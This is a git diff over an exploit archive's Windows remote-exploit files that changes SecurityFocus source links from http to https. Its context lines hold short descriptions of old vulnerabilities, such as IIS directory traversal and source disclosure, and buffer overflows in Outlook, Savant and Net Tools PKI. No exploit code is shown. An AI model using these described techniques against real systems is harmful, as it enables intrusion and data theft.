@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1453/info +source: https://www.securityfocus.com/bid/1453/info A buffer overflow exists in the Savant Web Server. It is possible to exploit this overflow by sending an unusually long GET request to the server. diff --git a/exploits/windows/remote/20070.txt b/exploits/windows/remote/20070.txt index 771ec30a1..31ddff03d 100644 --- a/exploits/windows/remote/20070.txt +++ b/exploits/windows/remote/20070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1462/info +source: https://www.securityfocus.com/bid/1462/info The HTTP interface for WorldClient 2.1 is vulnerable to a directory traversal. By requesting a URL composed of the filename and ..\ it is possible for a remote user to retrieve and dowload any file of known location. diff --git a/exploits/windows/remote/20074.java b/exploits/windows/remote/20074.java index c9e3b2b7c..8194804fd 100644 --- a/exploits/windows/remote/20074.java +++ b/exploits/windows/remote/20074.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1477/info +source: https://www.securityfocus.com/bid/1477/info Infopulse GateKeeper proxy server will crash if a string containing over 4096 characters is entered through port 2000. Arbitrary code execution is possible. Restarting the server is required in order to regain normal functionality. diff --git a/exploits/windows/remote/20078.pl b/exploits/windows/remote/20078.pl index 03aa36eea..66f3ec5a1 100755 --- a/exploits/windows/remote/20078.pl +++ b/exploits/windows/remote/20078.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1481/info +source: https://www.securityfocus.com/bid/1481/info All versions of Microsoft Outlook and Outlook Express are vulnerable to buffer overflow attacks where a remote user is capable of executing arbitrary code on an email recipient's system. diff --git a/exploits/windows/remote/20079.txt b/exploits/windows/remote/20079.txt index c31989ee5..e99ae5335 100644 --- a/exploits/windows/remote/20079.txt +++ b/exploits/windows/remote/20079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1481/info +source: https://www.securityfocus.com/bid/1481/info All versions of Microsoft Outlook and Outlook Express are vulnerable to buffer overflow attacks where a remote user is capable of executing arbitrary code on an email recipient's system. diff --git a/exploits/windows/remote/20086.c b/exploits/windows/remote/20086.c index 62a9f8f4d..ac61d6e31 100644 --- a/exploits/windows/remote/20086.c +++ b/exploits/windows/remote/20086.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1487/info +// source: https://www.securityfocus.com/bid/1487/info O'Reilly WebSite Professional is a web server package distributed by O'Reilly & Associates. Certain versions of this web server (the entire 2.X version line) ship with a utility containing a remotely exploitable buffer overflow. The utility in question is a search engine utility titled 'webfind.exe'. This program takes unchecked user input from a provided search page which can result in a remote user launching arbitrary commands on the server itself. The variable in question which is overwritten is QUERY_STRING derived from user 'keywords' for their search. diff --git a/exploits/windows/remote/20089.txt b/exploits/windows/remote/20089.txt index d6a5a9f0c..8007fb8cd 100644 --- a/exploits/windows/remote/20089.txt +++ b/exploits/windows/remote/20089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1488/info +source: https://www.securityfocus.com/bid/1488/info Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. Appending this string causes the request to be handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file specified in the request. There has been a report that source will be displayed up to the first '<%' encountered - '<%' and '%>' are server-side script delimiters. Pages which use the delimiters instead will display the entire source, or up to any '<%' in the page. This vulnerability is a variant of a previously discovered vulnerability, BugTraq ID 1193. diff --git a/exploits/windows/remote/20096.txt b/exploits/windows/remote/20096.txt index 7679300f2..008f91df5 100644 --- a/exploits/windows/remote/20096.txt +++ b/exploits/windows/remote/20096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1499/info +source: https://www.securityfocus.com/bid/1499/info When a remote user attempts to access an area protected by basic authentication with no realm defined, while specifying HTTP 1.0, Microsoft IIS will return an Access Denied error message containing the internal IP address of the host. Even if IIS is behind a firewall or NAT, it will disclose the true internal IP address to the remote user. diff --git a/exploits/windows/remote/20103.txt b/exploits/windows/remote/20103.txt index 3b8b769cf..717e8f79d 100644 --- a/exploits/windows/remote/20103.txt +++ b/exploits/windows/remote/20103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1508/info +source: https://www.securityfocus.com/bid/1508/info Requesting a specially formed url containing encoding (%2E) to SimpleServer 1.06 and possibley earlier versions, will enable a remote user to gain read access to known files above the SimpleServer directory. diff --git a/exploits/windows/remote/20106.cpp b/exploits/windows/remote/20106.cpp index 30d869335..d07553e7c 100644 --- a/exploits/windows/remote/20106.cpp +++ b/exploits/windows/remote/20106.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1514/info +source: https://www.securityfocus.com/bid/1514/info An attacker can send the NetBIOS name service a NetBIOS Name Conflict message even when the receiving machine is not in the process of registering its NetBIOS name. The target will then not attempt to use that name in any future netwrok connection attempts. This can lead to intermittent connectivity problems, or the loss of all NetBIOS functionality. diff --git a/exploits/windows/remote/20125.txt b/exploits/windows/remote/20125.txt index 9d1c64189..953650a2a 100644 --- a/exploits/windows/remote/20125.txt +++ b/exploits/windows/remote/20125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1525/info +source: https://www.securityfocus.com/bid/1525/info In February of 2000 CERT Coordination Center released an advisory titled "Malicious HTML Tags Embedded in Client Web Requests" (advisory attached in 'Credit' section"). This advisory was a joint release by the CERT Coordination Center, DoD-CERT, the DoD Joint Task Force for Computer Network Defense (JTF-CND), the Federal Computer Incident Response Capability (FedCIRC), and the National Infrastructure Protection Center (NIPC). The point of the advisory in essence was a warning about client side vulnerabilities brought about by malicious scripting from Rogue websites which could be exploited to run code on client side browsers (acting as unwary interpreters for the scripting in question). diff --git a/exploits/windows/remote/20134.pl b/exploits/windows/remote/20134.pl index 3eb4f1817..9644ce32d 100755 --- a/exploits/windows/remote/20134.pl +++ b/exploits/windows/remote/20134.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1536/info +source: https://www.securityfocus.com/bid/1536/info Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastructure) server ship with a buffer overflow vulnerability which could lead to a remote compromise of the system running the PKI server. The problem lies within the webserver component of the PKI server (strong.exe) which operates several 'virtual servers' required to operate the PKI server. The first is the Administrative Web Server which listens via TCP port 443, the second is Enrollment Web Server which listens on TCP port 444. Unlike the Administrative Web Server the Enrollment Web Server does not require credentials to be exchanged before a user can talk to the webserver. It is via this virtual server that an attacker can exploit the problem at hand. diff --git a/exploits/windows/remote/20135.txt b/exploits/windows/remote/20135.txt index e3d8e158b..36472fc3a 100644 --- a/exploits/windows/remote/20135.txt +++ b/exploits/windows/remote/20135.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1537/info +source: https://www.securityfocus.com/bid/1537/info Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastructure) server ship with a vulnerability which allows remote attackers to read any file in the system which the PKI server resides. The problem lies within the webserver component of the PKI server (strong.exe) which operates several 'virtual servers' required to operate the PKI server. The first is the Administrative Web Server which listens via TCP port 443, the second is Enrollment Web Server which listens on TCP port 444. Unlike the Administrative Web Server the Enrollment Web Server does not require credentials to be exchanged before a user can talk to the webserver. It is via this virtual server that an attacker can exploit the problem at hand. diff --git a/exploits/windows/remote/20136.txt b/exploits/windows/remote/20136.txt index 408e5b0d5..234c5d10c 100644 --- a/exploits/windows/remote/20136.txt +++ b/exploits/windows/remote/20136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1538/info +source: https://www.securityfocus.com/bid/1538/info Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastructure) server ship with a vulnerability which allows remote attackers to execute arbitrary commands on the system which the PKI server resides. The problem lies within the webserver component of the PKI server (strong.exe) which operates several 'virtual servers' required to operate the PKI server. The first is the Administrative Web Server which listens via TCP port 443, the second is Enrollment Web Server which listens on TCP port 444. Unlike the Administrative Web Server the Enrollment Web Server does not require credentials to be exchanged before a user can talk to the webserver. It is via this virtual server that an attacker can exploit the problem at hand. The following is taken directly from the CORE SDI advisory on this issue: diff --git a/exploits/windows/remote/20148.pl b/exploits/windows/remote/20148.pl index fe5417205..095af081a 100755 --- a/exploits/windows/remote/20148.pl +++ b/exploits/windows/remote/20148.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1568/info +source: https://www.securityfocus.com/bid/1568/info Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash or can be forced to execute arbitrary code. diff --git a/exploits/windows/remote/20151.pl b/exploits/windows/remote/20151.pl index d9d94b39a..4925baa1f 100755 --- a/exploits/windows/remote/20151.pl +++ b/exploits/windows/remote/20151.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1578/info +source: https://www.securityfocus.com/bid/1578/info Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server. diff --git a/exploits/windows/remote/20152.pl b/exploits/windows/remote/20152.pl index c0e10a0a7..d5595c684 100755 --- a/exploits/windows/remote/20152.pl +++ b/exploits/windows/remote/20152.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1578/info +source: https://www.securityfocus.com/bid/1578/info Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server. diff --git a/exploits/windows/remote/20180.c b/exploits/windows/remote/20180.c index 3649fef60..cb513e3de 100644 --- a/exploits/windows/remote/20180.c +++ b/exploits/windows/remote/20180.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1614/info +// source: https://www.securityfocus.com/bid/1614/info A number of unchecked buffers exists in Robotex Viking Server. This enables a malicious user to either crash the application or execute arbitrary code, depending on the data supplied. diff --git a/exploits/windows/remote/20182.txt b/exploits/windows/remote/20182.txt index 47ef94ee6..a693b5269 100644 --- a/exploits/windows/remote/20182.txt +++ b/exploits/windows/remote/20182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1617/info +source: https://www.securityfocus.com/bid/1617/info IPSWITCH ships a product titled IMail, an email server for usage on NT servers serving clients their mail via a web interface. To this end the IMail server provides a web server typically running on port 8383 for it's end users to access. Via this interface users may read and send mail, as well as mail with file attachments. Certain versions of IMail do not perform proper access validation however resulting in users being able to attach files resident on the server. The net result of this is users may attach files on the server to which they should have no access. This access is limited to the user privileges which the server is being run as, typically SYSTEM. diff --git a/exploits/windows/remote/20184.txt b/exploits/windows/remote/20184.txt index 8935ae90d..868726ed4 100644 --- a/exploits/windows/remote/20184.txt +++ b/exploits/windows/remote/20184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1627/info +source: https://www.securityfocus.com/bid/1627/info IRIS from eEye Digital Security is a protocol analyzer geared towards network management, it is currently in BETA. This product was formerly known as SpyNet CaptureNet. Certain versions of the this software are vulnerable to a remotely triggered buffer overflow attack. This attack is orchestrated by a malicious user launching multiple UDP sessions to random ports on the machine which IRIS resides on (and is in operation on). The net result of this buffer overflow is that the product ceases to function and may drive system resources to 100% before exiting. It may be possible that this overflow (a heap overflow according to the attached advisory) could result in a system compromise. No information indicating that this is the case has been released. diff --git a/exploits/windows/remote/20211.c b/exploits/windows/remote/20211.c index 93b7aa6ee..cfab59eed 100644 --- a/exploits/windows/remote/20211.c +++ b/exploits/windows/remote/20211.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1657/info +// source: https://www.securityfocus.com/bid/1657/info A number of unchecked static buffers exist in Mobius' DocumentDirect for the Internet program. Depending on the data entered, arbitrary code execution or a denial of service attack could be launched under the privilege level of the corresponding service. diff --git a/exploits/windows/remote/20214.pl b/exploits/windows/remote/20214.pl index 8210615df..fb2ec808a 100755 --- a/exploits/windows/remote/20214.pl +++ b/exploits/windows/remote/20214.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1661/info +source: https://www.securityfocus.com/bid/1661/info A vulnerability exists in the "Session Agent" portion of Firewall-1, from Check Point. This vulnerability appears to affect all versions of the session agent prior to the one shipped in FW-1 4.1. The session agent listens on a Windows 9x or NT box for connections from the firewall, requesting user authentication for connections. This information is all transmitted in cleartext, and is unauthenticated. This means it can be sniffed. In addition, the agent accepts connections from any host. Any person who can connect to the session agent can impersonate the Firewall-1 module, and request username and password information. If supplied, this can result in the compromise of that username and password. diff --git a/exploits/windows/remote/20222.cpp b/exploits/windows/remote/20222.cpp index 3e1fc3075..48966e0c4 100644 --- a/exploits/windows/remote/20222.cpp +++ b/exploits/windows/remote/20222.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1683/info +source: https://www.securityfocus.com/bid/1683/info By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 utilizes Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client will attempt authentication via NTLM, regardless of whether or not the host is a Windows telnet server or not. There is a possibility that the NTLM challenge/response authentication session could be monitored and subsequently cracked, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated in the tool "L0phtcrack." diff --git a/exploits/windows/remote/20223.txt b/exploits/windows/remote/20223.txt index 0e843a3dc..6cfe7a0c2 100644 --- a/exploits/windows/remote/20223.txt +++ b/exploits/windows/remote/20223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1684/info +source: https://www.securityfocus.com/bid/1684/info The Sambar Server was created to test a three-tier communication infrastructure modeled after the Sybase Open Client/Open Server. Soon thereafter, the idea of leveraging the infrastructure for dynamic delivery of content on the WWW resulted in the addition of an HTTP protocol stack, and efforts in supporting the notion of preexistent users via HTTP. diff --git a/exploits/windows/remote/20224.txt b/exploits/windows/remote/20224.txt index 6a7e1cedd..c53c30650 100644 --- a/exploits/windows/remote/20224.txt +++ b/exploits/windows/remote/20224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1685/info +source: https://www.securityfocus.com/bid/1685/info CamShot is a Windows 95/98/2000/NT web server that serves up web pages containing time stamped images captured from a video camera. The images can be viewed from anywhere on the network with a web browser. CamShot works with Video For Windows compatible video equipment. Certain trial versions of this software contain a possibly exploitable remote buffer overflow by way of a overly long user supplied 'Authorization' password. diff --git a/exploits/windows/remote/20235.pl b/exploits/windows/remote/20235.pl index 8737cd195..741a91a80 100755 --- a/exploits/windows/remote/20235.pl +++ b/exploits/windows/remote/20235.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1705/info +source: https://www.securityfocus.com/bid/1705/info Depending on the data entered, CiscoSecure ACS for Windows NT can be made to crash or arbitrary code execution can be made possible if an unusually long packet is sent to port 2002. diff --git a/exploits/windows/remote/20240.txt b/exploits/windows/remote/20240.txt index c37c32c9a..b6671b881 100644 --- a/exploits/windows/remote/20240.txt +++ b/exploits/windows/remote/20240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1714/info +source: https://www.securityfocus.com/bid/1714/info Due to a flaw in the method Microsoft Windows Media Player 7 handles OCX controls (ActiveX containers) in embedded in RTF email messages, it is possible to crash RTF-enabled email clients such as Microsoft Outlook and Outlook Express. While this vulnerability lies in the OCX control implementation in Windows Media Player 7, it only affects RTF-enabled email clients. diff --git a/exploits/windows/remote/20243.html b/exploits/windows/remote/20243.html index 596e2112f..dee65d147 100644 --- a/exploits/windows/remote/20243.html +++ b/exploits/windows/remote/20243.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1718/info +source: https://www.securityfocus.com/bid/1718/info It is possible for an outside attacker to view known files on a remote system if the target user visits a website or opens an email containing a specially formed script containing the JScript function 'GetObject()' and the ActiveX object 'htmlfile'. Microsoft Internet Explorer or Outlook Express will grant full access to the DOM of a HTML document object if the following code is inserted into HTML formatted document (the 'I" in SCRIPT has been replaced with a "!"): diff --git a/exploits/windows/remote/20247.txt b/exploits/windows/remote/20247.txt index eb7486044..a1987f781 100644 --- a/exploits/windows/remote/20247.txt +++ b/exploits/windows/remote/20247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1733/info +source: https://www.securityfocus.com/bid/1733/info Smartwin Technology CyberOffice Shopping Cart is a shopping cart application for e-commerce enabled websites running Windows NT 4.0 or 2000. diff --git a/exploits/windows/remote/20248.txt b/exploits/windows/remote/20248.txt index 5ffaee835..01c2d4d24 100644 --- a/exploits/windows/remote/20248.txt +++ b/exploits/windows/remote/20248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1734/info +source: https://www.securityfocus.com/bid/1734/info Smartwin Technology CyberOffice Shopping Cart is a shopping cart application for e-commerce enabled websites running Windows NT 4.0 or 2000. diff --git a/exploits/windows/remote/20249.txt b/exploits/windows/remote/20249.txt index 7ca5a7c2e..61a6e1709 100644 --- a/exploits/windows/remote/20249.txt +++ b/exploits/windows/remote/20249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1738/info +source: https://www.securityfocus.com/bid/1738/info It is possible for a malicious website operator to obtain copies of known files on a remote system if a website visitor is running Pegasus Mail client. diff --git a/exploits/windows/remote/20266.txt b/exploits/windows/remote/20266.txt index 2a3d20d17..16a2af19f 100644 --- a/exploits/windows/remote/20266.txt +++ b/exploits/windows/remote/20266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1754/info +source: https://www.securityfocus.com/bid/1754/info If a malicious website operator were to embed a specially crafted java object into a HTML document, it would be possible to execute arbitrary programs on a target host viewing the webpage through either Microsoft Internet Explorer or Outlook. The com.ms.activeX.ActiveXComponent java object inserted into an tag will allow the creation and scripting of arbitrary ActiveX objects even if they may present security hazards. diff --git a/exploits/windows/remote/20269.txt b/exploits/windows/remote/20269.txt index 1258012ae..7939e7a8a 100644 --- a/exploits/windows/remote/20269.txt +++ b/exploits/windows/remote/20269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1756/info +source: https://www.securityfocus.com/bid/1756/info If Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed Authoring and Versioning (WebDAV) search implementation. Hidden directories, include files (*.inc), or other documents that would not normally be accessible through the regular website interface can be exposed through this exploit. diff --git a/exploits/windows/remote/20283.txt b/exploits/windows/remote/20283.txt index 372cd1766..1ca15d12f 100644 --- a/exploits/windows/remote/20283.txt +++ b/exploits/windows/remote/20283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1780/info +source: https://www.securityfocus.com/bid/1780/info Share level password protection for the File and Print Sharing service in Windows 95/98/ME can be bypassed. diff --git a/exploits/windows/remote/20284.txt b/exploits/windows/remote/20284.txt index 2d448aafe..a124d850b 100644 --- a/exploits/windows/remote/20284.txt +++ b/exploits/windows/remote/20284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1780/info +source: https://www.securityfocus.com/bid/1780/info Share level password protection for the File and Print Sharing service in Windows 95/98/ME can be bypassed. diff --git a/exploits/windows/remote/20287.c b/exploits/windows/remote/20287.c index 0dcbc8de5..d1831973a 100644 --- a/exploits/windows/remote/20287.c +++ b/exploits/windows/remote/20287.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1789/info +// source: https://www.securityfocus.com/bid/1789/info All-mail is an smtp server for Windows NT and 2000 platforms offered by Nevis Systems. It is vulnerable to remotely exploitable buffer overflow attacks that may lead to an attacker gaining control of the victim host. diff --git a/exploits/windows/remote/20288.c b/exploits/windows/remote/20288.c index d4ac05d7b..89c9c3443 100644 --- a/exploits/windows/remote/20288.c +++ b/exploits/windows/remote/20288.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1796/info +// source: https://www.securityfocus.com/bid/1796/info The file sharing (SMB) service in Windows enables client applications to access and modify files from a server on the network. diff --git a/exploits/windows/remote/20298.c b/exploits/windows/remote/20298.c index aa1cc65c9..c61405a63 100644 --- a/exploits/windows/remote/20298.c +++ b/exploits/windows/remote/20298.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". diff --git a/exploits/windows/remote/20299.pl b/exploits/windows/remote/20299.pl index 5369ed50f..d999fe409 100755 --- a/exploits/windows/remote/20299.pl +++ b/exploits/windows/remote/20299.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". diff --git a/exploits/windows/remote/20300.c b/exploits/windows/remote/20300.c index 4ba236f77..1573132d8 100644 --- a/exploits/windows/remote/20300.c +++ b/exploits/windows/remote/20300.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". diff --git a/exploits/windows/remote/20301.php b/exploits/windows/remote/20301.php index de893d9ed..b84bdd183 100644 --- a/exploits/windows/remote/20301.php +++ b/exploits/windows/remote/20301.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". diff --git a/exploits/windows/remote/20302.pl b/exploits/windows/remote/20302.pl index 1a1e3645b..a27e0cd6e 100755 --- a/exploits/windows/remote/20302.pl +++ b/exploits/windows/remote/20302.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". @@ -679,7 +679,7 @@ print "\n IIS-PLUS shell v 3.7 by SPABAM. 2002. spabam\@yahoo.com"; print "\n -http://www.securityfocus.com/bid/1806/exploit/ +https://www.securityfocus.com/bid/1806/exploit/ "; print "\n A IIS HTTP exploit for Micro\$oft WebServers using 450 URL."; print "\n diff --git a/exploits/windows/remote/20305.txt b/exploits/windows/remote/20305.txt index b3f52dec1..3b6d23db7 100644 --- a/exploits/windows/remote/20305.txt +++ b/exploits/windows/remote/20305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1811/info +source: https://www.securityfocus.com/bid/1811/info Microsoft Site Server is an intranet server designed for an NT Server with IIS. Site Server enables users to locate and view information stored in various locations through personalized web pages and emails. diff --git a/exploits/windows/remote/20306.html b/exploits/windows/remote/20306.html index 8eed91aa9..c9ae62257 100644 --- a/exploits/windows/remote/20306.html +++ b/exploits/windows/remote/20306.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1812/info +source: https://www.securityfocus.com/bid/1812/info An attacker may gain read access on remote systems by specifying a custom codebase in a Java applet, and delivering to the victim(s) via HTML email or a website. Any arbitrary codebase can be referenced by a java applet that was loaded by an tag in conjunction with a jar file when using Microsoft Internet Explorer or Outlook/Outlook Express. This allows for the possibility of any known file to be read by a remote attacker. diff --git a/exploits/windows/remote/20309.txt b/exploits/windows/remote/20309.txt index 891b5677a..6092b7cf6 100644 --- a/exploits/windows/remote/20309.txt +++ b/exploits/windows/remote/20309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1818/info +source: https://www.securityfocus.com/bid/1818/info Microsoft IIS 3.0 came with a sample program, newdsn.exe, installed by default in the directory wwwroot/scripts/tools/. Execution of this program with a properly submitted URL could allow for remote file creation. The file created is a Microsoft Access Database, but can have any extension, including .html. diff --git a/exploits/windows/remote/20324.txt b/exploits/windows/remote/20324.txt index b1e0bed5d..c153bea4d 100644 --- a/exploits/windows/remote/20324.txt +++ b/exploits/windows/remote/20324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1839/info +source: https://www.securityfocus.com/bid/1839/info Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS). This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: diff --git a/exploits/windows/remote/20325.txt b/exploits/windows/remote/20325.txt index 6fd56216d..c3a18b24b 100644 --- a/exploits/windows/remote/20325.txt +++ b/exploits/windows/remote/20325.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1839/info +source: https://www.securityfocus.com/bid/1839/info Acquiring access to known files outside of the web root is possible through directory traversal techniques in Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: diff --git a/exploits/windows/remote/20334.java b/exploits/windows/remote/20334.java index bb1876beb..f1fe2c6f1 100644 --- a/exploits/windows/remote/20334.java +++ b/exploits/windows/remote/20334.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1860/info +source: https://www.securityfocus.com/bid/1860/info FTP Serv-U is an internet FTP server from CatSoft. diff --git a/exploits/windows/remote/20335.txt b/exploits/windows/remote/20335.txt index 9572105bb..1f737a554 100644 --- a/exploits/windows/remote/20335.txt +++ b/exploits/windows/remote/20335.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1861/info +source: https://www.securityfocus.com/bid/1861/info A cross-site scripting vulnerability has been reported in Microsoft Indexing Services for Windows 2000/NT4 and its handling of the .htw extension. If a user inadvertantly opened a hostile link through a browser or HTML compliant e-mail client, active content such as JavaScript may be executed. For example, the following link when processed by IIS will yield successful exploitation: diff --git a/exploits/windows/remote/20371.txt b/exploits/windows/remote/20371.txt index 7f66134fd..9d01c410a 100644 --- a/exploits/windows/remote/20371.txt +++ b/exploits/windows/remote/20371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1884/info +source: https://www.securityfocus.com/bid/1884/info Samba is a set of of programs that allow Windows® clients access to a Unix server's filespace and printers over NetBIOS. A directory traversal vulnerability exists in Microsoft's implementation of the SMB file and print sharing protocol for Windows 95 build 490.r6 and Windows for Workgroups. diff --git a/exploits/windows/remote/20375.txt b/exploits/windows/remote/20375.txt index 692c4e5a9..056bfc09b 100644 --- a/exploits/windows/remote/20375.txt +++ b/exploits/windows/remote/20375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1891/info +source: https://www.securityfocus.com/bid/1891/info A vulnerability exists in Sun Microsystems' JavaWebServer for Win32, version 1.1Beta. JavaWebServer is a Java-oriented web application development platform. diff --git a/exploits/windows/remote/20384.txt b/exploits/windows/remote/20384.txt index 089446c7b..34e3661e5 100644 --- a/exploits/windows/remote/20384.txt +++ b/exploits/windows/remote/20384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1912/info +source: https://www.securityfocus.com/bid/1912/info When Microsoft IIS receives a valid request for an executable file, the filename is then passed onto the underlying operating system which executes the file. In the event that IIS receives a specially formed request for an executable file followed by operating system commands, IIS will proceed to process the entire string rather than rejecting it. Thus, a malicious user may perform system commands through cmd.exe under the context of the IUSR_machinename account which could possibly lead to privilege escalation, deletion, addition, and modification of files, or full compromise of the server. diff --git a/exploits/windows/remote/20399.html b/exploits/windows/remote/20399.html index d1efe6f09..4214db9e0 100644 --- a/exploits/windows/remote/20399.html +++ b/exploits/windows/remote/20399.html @@ -1,5 +1,5 @@